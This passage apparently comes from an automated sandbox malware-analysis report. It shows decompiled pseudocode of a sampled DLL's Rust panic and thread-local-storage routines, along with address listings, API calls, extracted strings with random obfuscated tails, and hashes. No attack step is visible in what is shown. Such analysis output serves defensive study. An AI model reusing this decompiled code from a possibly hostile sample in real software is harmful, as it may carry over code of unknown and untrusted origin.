						if( *_t194 <= 1) {
							_t195 =  *0x6f28adb0; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6F23D530(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
					} else {
						E6F256EE0(_t264,  &M6F27D0E7, 0x46, _t340,  &_v68, 0x6f27d060, 0x6f27d1ac);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6f28a044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6f28a044;
							_t202 = E6F242B10(_t264, 0x6f28a044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6f28a044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6f28a044;
								_t203 = E6F242B10(_t264, 0x6f28a044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6f28adc8;
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6f28a044;
										_t332 = _t205;
										_t206 =  *0x6f28a044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6F242B10(_t264, 0x6f28a044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6F256C30(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
												HeapFree( *0x6f28adc8, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6f28adb0;
											 *0x6f28adb0 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6f243440
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6f28adc8 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6F23C800(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6F256EE0(_t264, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6f27d050, 0x6f27d720);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6F23C690(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6F23C800(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6f27d8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6f23de50;
										_v60 =  &_v100;
										_v56 = 0x6f23de50;
										_v52 =  &_v148;
										_v48 = E6F23DE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6F23D2A0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6f28adc8, 0, _t245);
											}
											HeapFree( *0x6f28adc8, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											__imp__AcquireSRWLockExclusive(0x6f28adac);
											_v68 = 0x6f27d2c0;
											_v64 = 1;
											_v152 = 0x6f28adac;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6F23DEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6F23D2A0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6f28adac);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6F23C800(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6F23DC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6f28adbc);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6f27da8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6f27cd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6F23D2A0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6F23D460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6F23D440(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6f28a040 = 0;
											_t356 =  *0x6f28a040;
											if( *0x6f28a040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6f27d96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6f27cd60;
											_v48 = 0;
											_v20 = 3;
											if(E6F23D2A0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6f28adc8, 0, _t235);
											}
											HeapFree( *0x6f28adc8, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}






























































































                          0x6f23c8cc
                          0x6f23c8cf
                          0x6f23c8d6
                          0x6f23c8dd
                          0x6f23c8e2
                          0x6f23c8e7
                          0x6f23c8f0
                          0x6f23c8f3
                          0x6f23c8f9
                          0x6f23c901
                          0x6f23c906
                          0x6f23c908
                          0x6f23c922
                          0x6f23c927
                          0x6f23c92a
                          0x6f23c92a
                          0x6f23c92e
                          0x6f23c931
                          0x6f23c934
                          0x6f23c936
                          0x6f23c9aa
                          0x6f23c9ad
                          0x6f23ca0a
                          0x6f23ca11
                          0x6f23ca1b
                          0x6f23ca22
                          0x6f23ca29
                          0x6f23ca2d
                          0x6f23ca34
                          0x6f23ca3b
                          0x6f23ca41
                          0x6f23ca44
                          0x6f23ca47
                          0x6f23ca4d
                          0x6f23ca54
                          0x6f23ca57
                          0x6f23ca5e
                          0x6f23ca63
                          0x6f23ca65
                          0x6f23ca6c
                          0x6f23ca74
                          0x6f23ca77
                          0x6f23ca79
                          0x6f23ca7c
                          0x6f23ca7c
                          0x6f23ca7f
                          0x6f23ca82
                          0x6f23ca86
                          0x6f23ca88
                          0x6f23ca8a
                          0x6f23ca8e
                          0x6f23ca90
                          0x6f23ca90
                          0x6f23ca9c
                          0x6f23ca9c
                          0x6f23caaa
                          0x6f23caaa
                          0x00000000
                          0x6f23ca65
                          0x6f23c9b2
                          0x6f23c9b5
                          0x6f23c9bc
                          0x6f23c9c3
                          0x6f23c9ca
                          0x6f23c9d1
                          0x6f23c9d5
                          0x6f23c9dc
                          0x6f23c9e3
                          0x6f23c9e8
                          0x6f23c9ea
                          0x00000000
                          0x6f23c9f0
                          0x6f23c9f5
                          0x6f23c9fd
                          0x6f23ca00
                          0x6f23ca02
                          0x00000000
                          0x6f23ca02
                          0x6f23c93d
                          0x6f23c93d
                          0x6f23c945
                          0x6f23c94b
                          0x6f23c955
                          0x6f23c95c
                          0x6f23c963
                          0x6f23c969
                          0x6f23c96c
                          0x6f23c96f
                          0x6f23c972
                          0x6f23c975
                          0x6f23c97a
                          0x6f23c97d
                          0x6f23c97f
                          0x6f23cab3
                          0x6f23cab3
                          0x6f23cab6
                          0x6f23cab8
                          0x6f23cb8b
                          0x6f23cb90
                          0x6f23cb93
                          0x6f23cb96
                          0x6f23cd97
                          0x00000000
                          0x6f23cd97
                          0x6f23cb9c
                          0x6f23cb9f
                          0x6f23cd90
                          0x00000000
                          0x6f23cd90
                          0x6f23cba5
                          0x6f23cba7
                          0x00000000
                          0x00000000
                          0x6f23cbb0
                          0x6f23cbb5
                          0x6f23cbb8
                          0x6f23cbbb
                          0x6f23cbbd
                          0x00000000
                          0x00000000
                          0x6f23cbc3
                          0x00000000
                          0x6f23cbc3
                          0x6f23cabe
                          0x00000000
                          0x6f23c985
                          0x6f23c99d
                          0x6f23c9a2
                          0x6f23cdbe
                          0x6f23cdbe
                          0x6f23cdc0
                          0x6f23cdc0
                          0x6f23cdc5
                          0x6f23caf3
                          0x6f23caf3
                          0x6f23caf6
                          0x6f23caf9
                          0x6f23cb00
                          0x6f23cb02
                          0x6f23cb07
                          0x6f23cb07
                          0x6f23cb0d
                          0x6f23cb16
                          0x6f23cbf3
                          0x6f23cbf3
                          0x6f23cbf8
                          0x6f23cbfa
                          0x6f23cbfc
                          0x6f23cc01
                          0x6f23cc01
                          0x6f23cc07
                          0x6f23cc0d
                          0x6f23cc0f
                          0x6f23cdcf
                          0x6f23cdd4
                          0x6f23cdd6
                          0x6f23cde6
                          0x6f23cdeb
                          0x6f23cdf0
                          0x6f23cdf2
                          0x6f23ce32
                          0x6f23ce38
                          0x6f23ce3f
                          0x6f23ce41
                          0x6f23ce46
                          0x6f23ce48
                          0x6f23ce4f
                          0x6f23ce52
                          0x6f23ce57
                          0x6f23ce57
                          0x6f23ce5c
                          0x00000000
                          0x6f23ce5c
                          0x6f23cdf4
                          0x6f23cdfe
                          0x6f23ce03
                          0x6f23ce05
                          0x6f23ce05
                          0x6f23ce08
                          0x6f23ce0b
                          0x6f23ce0e
                          0x6f23ceb8
                          0x6f23cebe
                          0x6f23cec9
                          0x6f23cec9
                          0x6f23cece
                          0x6f23cece
                          0x6f23ced0
                          0x6f23ced0
                          0x6f23ced2
                          0x6f23cedd
                          0x6f23cedd
                          0x6f23cee2
                          0x6f23cee2
                          0x6f23ceed
                          0x6f23cef5
                          0x6f23cef8
                          0x6f23cefb
                          0x6f23cefb
                          0x6f23cefb
                          0x6f23cac1
                          0x6f23cac1
                          0x6f23cac7
                          0x6f23caca
                          0x6f23caca
                          0x6f23cad0
                          0x6f23cad3
                          0x6f23cad5
                          0x6f23cae3
                          0x6f23cae3
                          0x6f23cae5
                          0x6f23cbcd
                          0x6f23cbd0
                          0x6f23cbde
                          0x6f23cbe0
                          0x00000000
                          0x00000000
                          0x6f23cbe6
                          0x6f23cbe9
                          0x6f23cbeb
                          0x00000000
                          0x6f23cbeb
                          0x6f23caeb
                          0x6f23caee
                          0x6f23caf0
                          0x00000000
                          0x6f23caf0
                          0x6f23cec0
                          0x6f23cec2
                          0x00000000
                          0x6f23cec2
                          0x6f23ce14
                          0x6f23ce17
                          0x00000000
                          0x00000000
                          0x6f23ce1d
                          0x6f23ce20
                          0x00000000
                          0x00000000
                          0x6f23ce26
                          0x6f23ce28
                          0x00000000
                          0x6f23ce28
                          0x6f23cdd8
                          0x6f23cddd
                          0x6f23cddf
                          0x00000000
                          0x00000000
                          0x6f23cde1
                          0x00000000
                          0x6f23cc15
                          0x6f23cc15
                          0x6f23cc17
                          0x6f23cc1a
                          0x6f23ce62
                          0x6f23ce62
                          0x6f23ce65
                          0x6f23ce68
                          0x6f23ce68
                          0x6f23ce6b
                          0x6f23ce71
                          0x6f23ce78
                          0x6f23ce7f
                          0x6f23ce85
                          0x6f23ce87
                          0x6f23ce8d
                          0x6f23ce90
                          0x6f23ce96
                          0x6f23ce96
                          0x6f23ce90
                          0x6f23ce87
                          0x00000000
                          0x6f23ce7f
                          0x6f23cc20
                          0x6f23cc27
                          0x6f23cc2e
                          0x6f23cc2e
                          0x00000000
                          0x6f23cc2e
                          0x6f23cb1c
                          0x6f23cb1f
                          0x6f23cb21
                          0x00000000
                          0x00000000
                          0x6f23cb27
                          0x6f23cb2a
                          0x6f23cb2d
                          0x6f23cdb6
                          0x6f23cdbb
                          0x00000000
                          0x6f23cdbb
                          0x6f23cb33
                          0x6f23cb39
                          0x6f23cb3e
                          0x6f23cb40
                          0x6f23cb43
                          0x6f23cb4a
                          0x6f23cb4f
                          0x6f23cb52
                          0x6f23cb54
                          0x6f23cb57
                          0x6f23cb59
                          0x6f23cb5b
                          0x6f23cb5e
                          0x6f23cb60
                          0x6f23cb63
                          0x6f23cb63
                          0x6f23cb5e
                          0x6f23cb68
                          0x6f23cb68
                          0x6f23cb6b
                          0x6f23cb6e
                          0x6f23caaf
                          0x6f23caaf
                          0x6f23cab1
                          0x00000000
                          0x6f23cb74
                          0x6f23cb74
                          0x6f23cb78
                          0x6f23cb7b
                          0x6f23cb7e
                          0x6f23cea0
                          0x6f23cea6
                          0x6f23cea8
                          0x6f23ceab
                          0x6f23d062
                          0x6f23d062
                          0x6f23d067
                          0x6f23d068
                          0x6f23d068
                          0x6f23cc30
                          0x6f23cc37
                          0x6f23cc3e
                          0x6f23cc45
                          0x6f23cc4c
                          0x6f23cc50
                          0x6f23cc57
                          0x6f23cc5e
                          0x6f23cc65
                          0x6f23cc6d
                          0x6f23cc70
                          0x6f23cc76
                          0x6f23cc79
                          0x6f23cc7f
                          0x6f23cc85
                          0x6f23cc8c
                          0x6f23cc95
                          0x6f23cc9c
                          0x6f23cca2
                          0x6f23cca9
                          0x6f23ccac
                          0x6f23ccba
                          0x6f23ccc1
                          0x6f23ccc9
                          0x6f23cccc
                          0x6f23ccce
                          0x6f23ccd1
                          0x6f23ccd4
                          0x6f23ccdb
                          0x6f23ccdd
                          0x6f23cce3
                          0x6f23cce5
                          0x6f23cce5
                          0x6f23ccf1
                          0x6f23ccf1
                          0x6f23ccff
                          0x6f23ccff
                          0x6f23cd04
                          0x6f23cd15
                          0x6f23cd1a
                          0x6f23cf0b
                          0x6f23cf1a
                          0x6f23cf21
                          0x6f23cf28
                          0x6f23cf32
                          0x6f23cf35
                          0x6f23cf3c
                          0x6f23cf43
                          0x6f23cf49
                          0x6f23cf50
                          0x6f23cf53
                          0x6f23cf5a
                          0x6f23cf5f
                          0x6f23cf68
                          0x6f23cf6e
                          0x6f23cf71
                          0x00000000
                          0x00000000
                          0x6f23cf78
                          0x6f23cf80
                          0x6f23cf83
                          0x6f23cf85
                          0x00000000
                          0x6f23cd20
                          0x6f23cd23
                          0x6f23cfc0
                          0x6f23cfc3
                          0x6f23cfc5
                          0x6f23cfc7
                          0x6f23cfca
                          0x6f23cfcf
                          0x6f23cfcf
                          0x6f23cfca
                          0x6f23cfd7
                          0x6f23cfdd
                          0x6f23cfe3
                          0x6f23cfe5
                          0x6f23cfe7
                          0x6f23cfea
                          0x6f23cfef
                          0x6f23cfef
                          0x6f23cfea
                          0x6f23cff9
                          0x6f23cfff
                          0x6f23d003
                          0x6f23d00a
                          0x6f23d012
                          0x6f23d019
                          0x6f23d020
                          0x6f23d027
                          0x6f23d02e
                          0x6f23d032
                          0x6f23d039
                          0x6f23d040
                          0x6f23d048
                          0x6f23d04b
                          0x6f23d04e
                          0x6f23d053
                          0x6f23d055
                          0x6f23d055
                          0x6f23d057
                          0x6f23d05b
                          0x6f23d060
                          0x00000000
                          0x6f23d060
                          0x6f23cd2b
                          0x6f23cd31
                          0x6f23cd33
                          0x00000000
                          0x00000000
                          0x6f23cd3c
                          0x6f23cd3f
                          0x6f23cd46
                          0x6f23cd4d
                          0x6f23cd54
                          0x6f23cd5b
                          0x6f23cd62
                          0x6f23cd70
                          0x00000000
                          0x00000000
                          0x6f23cd7b
                          0x6f23cd7e
                          0x6f23cd86
                          0x6f23cd88
                          0x6f23cf88
                          0x6f23cf8b
                          0x6f23cf92
                          0x6f23cf9b
                          0x6f23cf9d
                          0x6f23cf9f
                          0x6f23cf9f
                          0x6f23cfab
                          0x6f23cfab
                          0x6f23cfbb
                          0x00000000
                          0x6f23cfbb
                          0x6f23cd1a
                          0x6f23ceb1
                          0x00000000
                          0x6f23ceb1
                          0x6f23cb84
                          0x00000000
                          0x6f23cb84
                          0x6f23cb6e
                          0x6f23cb16
                          0x6f23c97f

                          APIs
                            • Part of subcall function 6F23D1B0: TlsGetValue.KERNEL32(00000000,00000001,6F23C906), ref: 6F23D1BB
                            • Part of subcall function 6F23D1B0: TlsGetValue.KERNEL32(00000000), ref: 6F23D1F3
                          • AcquireSRWLockShared.KERNEL32(6F28ADBC), ref: 6F23C945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6F23CA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23CAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6F23CB0D
                          • TlsGetValue.KERNEL32(00000000), ref: 6F23CC07
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6F23CCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23CCFF
                          • GetProcessHeap.KERNEL32 ref: 6F23CDD8
                          • HeapAlloc.KERNEL32(03230000,00000000,00000010), ref: 6F23CDEB
                          • TlsSetValue.KERNEL32(00000000,00000000,03230000,00000000,00000010), ref: 6F23CE5C
                          • HeapFree.KERNEL32(00000000,00000000,03230000,00000000,00000010), ref: 6F23CEDD
                          Strings
                          • Y3$o, xrefs: 6F23C8C5
                          • full, xrefs: 6F23CEB8
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6F23C90D, 6F23C988
                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6F23CDC0
                          • already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl, xrefs: 6F23CDA1
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$FreeValue$AcquireAllocLockProcessShared
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $Y3$o$already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf$full
                          • API String ID: 2275035175-1687021739
                          • Opcode ID: 70c092d4269e285d76a3ea58a3d54cad1617f8229c2183cd12a8f661ad497dee
                          • Instruction ID: 505fde60a4e2d224beab940dbddfe3b9a6026b3fada5f097a387f1917306eefd
                          • Opcode Fuzzy Hash: 70c092d4269e285d76a3ea58a3d54cad1617f8229c2183cd12a8f661ad497dee
                          • Instruction Fuzzy Hash: 7F1235F2E4022E9BEB14CFA4C894B9EBBF2FF45715F10811AD415AB280DB75A855CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C890, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 409memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6F23C890(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void* _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void* _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6F243B50;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6f27d9cc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6f28adc0], esi");
				_t193 = E6F23D1B0(_t268, 0x6f27d9cc);
				_t349 = _t193;
				if(_t193 == 0) {
					_t193 = E6F256EE0(_t268,  &M6F27D0E7, 0x46, _t349,  &_v68, 0x6f27d060, 0x6f27d1ac);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6f27cd60;
						_v120 = 0x6f27d014;
						_v68 = 0x6f27da50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6F232640;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6F23D2A0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6f28adc8, 0, _t259);
							}
							_t197 = HeapFree( *0x6f28adc8, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6f27da14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6f27cd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6F23D2A0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6f28adbc);
					_v144 = 0x6f28adbc;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6F23D1B0(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6f28adb0; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6F23D530(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6F256EE0(_t268,  &M6F27D0E7, 0x46, _t352,  &_v68, 0x6f27d060, 0x6f27d1ac);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
